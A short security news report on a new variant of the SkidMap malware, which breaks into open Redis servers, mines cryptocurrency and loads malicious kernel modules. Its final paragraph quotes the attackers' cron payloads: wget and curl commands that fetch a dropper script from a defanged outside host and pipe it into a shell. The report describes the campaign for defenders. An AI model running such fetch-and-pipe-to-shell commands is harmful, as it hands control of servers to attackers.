20.Lock AbstractDigital Circular Esm W900

According to recent reports, there have been instances of threat actors using malware called “SkidMap” to exploit vulnerable Redis systems.

Earlier versions of SkidMap were used to surreptitiously mine cryptocurrency and create false network traffic and CPU usage by loading malicious kernel modules. 

However, this malware’s recent version seems quite sophisticated and targets only open Redis instances. 

Further analysis of the new variant on SkidMap revealed activities like adaptation to the operating system where it gets executed and choosing the binary to download based on the Linux Distribution architecture on the infected system.

Initially, the threat actor attempts to login to open Redis instances for setting up cron tasks with a variable using base64 string. These strings consist of two cron tasks to run a “wget” (wget hxxp://z[.]shavsl[.]com/b -qO – | sh) and “curl” (curl -fsSL hxxp://z[.]shavsl[.]com/b | sh)command that gets executed at a 10 minute interval for downloading the dropper scripts ‘b’, ‘c’ and ‘f’.